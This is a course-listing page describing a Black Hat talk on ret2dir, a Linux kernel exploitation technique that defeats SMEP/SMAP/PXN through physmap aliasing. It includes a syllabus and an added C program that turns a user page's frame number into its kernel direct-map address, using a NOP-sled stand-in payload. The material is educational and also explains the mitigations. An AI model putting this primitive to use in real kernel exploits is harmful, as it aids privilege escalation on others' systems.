YoVDO

Ret2dir - Deconstructing Kernel Isolation

Offered By: Black Hat via YouTube

Tags

Black Hat Courses
Cybersecurity Courses
Operating System Security Courses
Exploit Development Courses

Course Description

Overview

This Black Hat conference talk introduces return-to-direct-mapped memory (ret2dir), a kernel exploitation technique that defeats the isolation mechanisms meant to keep a hijacked kernel control flow out of user memory, such as SMEP, SMAP and PXN. Those protections assume that kernel and user memory are disjoint; ret2dir sidesteps them by abusing the implicit sharing of physical memory between the two: the kernel's direct-mapped region (physmap) aliases every physical page frame, including the frames backing attacker-controlled user pages, so a payload placed in user memory has a kernel-space "synonym" that a corrupted code or data pointer can be redirected to. The talk covers how to locate that synonym, how Linux manages physical memory and page frames, what to do when frame numbers are not directly available (physmap spraying and signatures), and how to build ret2dir exploits against several Linux targets and architectures, with demonstrations. It closes with the implications for kernel security and a proposed mitigation: an exclusive page frame ownership scheme for the Linux kernel, which removes the alias for frames that are owned by user space.
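The address-aliasing step the talk describes (finding the physmap "synonym" of a user page) can be worked through in a few lines. The following is an added example, not code from the talk or from the ret2dir authors: it decodes a /proc/PID/pagemap entry to obtain the page frame number backing a user address and adds it to an assumed, non-randomized x86-64 direct-map base (0xffff880000000000, the PAGE_OFFSET of kernels from the talk's era; the base is an assumption, not a value taken from the page). The main() maps a page, fills it with a stand-in payload and prints where its synonym would be. On kernels since 4.0 the PFN field is zeroed for readers without CAP_SYS_ADMIN, and since 4.8 CONFIG_RANDOMIZE_MEMORY randomizes the physmap base, so an unprivileged run on a modern kernel will report the PFN as unavailable; that is the information leak these changes closed, and the reason the talk's spraying and signature techniques exist.

```c
/* Added example: ret2dir synonym lookup (not the talk's own code). */
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/mman.h>

#define PAGE_SHIFT 12
#define PAGE_SIZE  (1ULL << PAGE_SHIFT)

/* Assumption: x86-64 direct-map base before physmap randomization
 * (PAGE_OFFSET = 0xffff880000000000 on kernels of the talk's era). */
#define PHYSMAP_BASE 0xffff880000000000ULL

/* /proc/PID/pagemap entry layout (Documentation/vm/pagemap.txt):
 * bits 0-54 PFN if present, bit 55 soft-dirty, bit 61 file-page/shared-anon,
 * bit 62 swapped, bit 63 present. */
#define PM_PFN_MASK ((1ULL << 55) - 1)
#define PM_PRESENT  (1ULL << 63)

/* PFN from a pagemap entry, or 0 if the page is not present
 * (or the PFN was zeroed, as Linux >= 4.0 does for unprivileged readers). */
uint64_t pagemap_pfn(uint64_t entry)
{
    if (!(entry & PM_PRESENT))
        return 0;
    return entry & PM_PFN_MASK;
}

/* Kernel-space alias of the user address uaddr backed by frame pfn:
 * the direct map places frame pfn at base + pfn*PAGE_SIZE and the
 * in-page offset is preserved. */
uint64_t physmap_synonym(uint64_t base, uint64_t pfn, uint64_t uaddr)
{
    return base + (pfn << PAGE_SHIFT) + (uaddr & (PAGE_SIZE - 1));
}

/* Read the pagemap entry covering uaddr; 0 on failure (non-Linux or
 * unreadable). Each virtual page has one 8-byte entry, indexed by VPN. */
uint64_t read_pagemap_entry(uint64_t uaddr)
{
    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0)
        return 0;
    uint64_t entry = 0;
    off_t off = (off_t)((uaddr >> PAGE_SHIFT) * sizeof(uint64_t));
    ssize_t n = pread(fd, &entry, sizeof entry, off);
    close(fd);
    return n == (ssize_t)sizeof entry ? entry : 0;
}

int main(void)
{
    /* Map one page and touch it so a frame is allocated: this is the
     * user page a ret2dir attacker would fill with code or a fake object. */
    void *p = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED) {
        perror("mmap");
        return 1;
    }
    memset(p, 0x90, PAGE_SIZE);              /* NOP sled as a stand-in payload */
    uint64_t uaddr = (uint64_t)(uintptr_t)p + 0x100;

    uint64_t pfn = pagemap_pfn(read_pagemap_entry(uaddr));
    if (pfn == 0) {
        puts("PFN unavailable: not Linux, or pagemap PFNs hidden "
             "(CAP_SYS_ADMIN required since Linux 4.0)");
    } else {
        printf("user %#llx -> pfn %#llx -> physmap synonym %#llx\n",
               (unsigned long long)uaddr, (unsigned long long)pfn,
               (unsigned long long)physmap_synonym(PHYSMAP_BASE, pfn, uaddr));
    }
    munmap(p, PAGE_SIZE);
    return 0;
}
```

Run as root on a pre-4.8 x86-64 kernel to see a real synonym; without the PFN, an attacker must instead fill many pages with the payload (physmap spraying) and guess an address in the direct map, trading a precise lookup for a probability of success that grows with the fraction of physical memory sprayed.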

Syllabus

Introduction
About me
Agenda
Kernel Vulnerabilities
Linux
Kernel Attack Model
Why do they work
Protections
Summary
Questions
Return to Direct-Mapped Memory (ret2dir)
Kernel Space Layout
Role of Kernel Space Layout
Properties of the Region
Threat Model
Address aliasing
Attack
Location of synonym
Problems
How
Second problem
How Linux manages physical memory
How Linux manages page frames
What if page frames are not available
Physmap spraying
Physmap signatures
Vulnerability overview
Vulnerability data structure
Static key
How to abuse it
How it works
What happens if this map is not executable
How this works
Demo
Exploit DB
Probability of success
Pagegas


Taught by

Black Hat
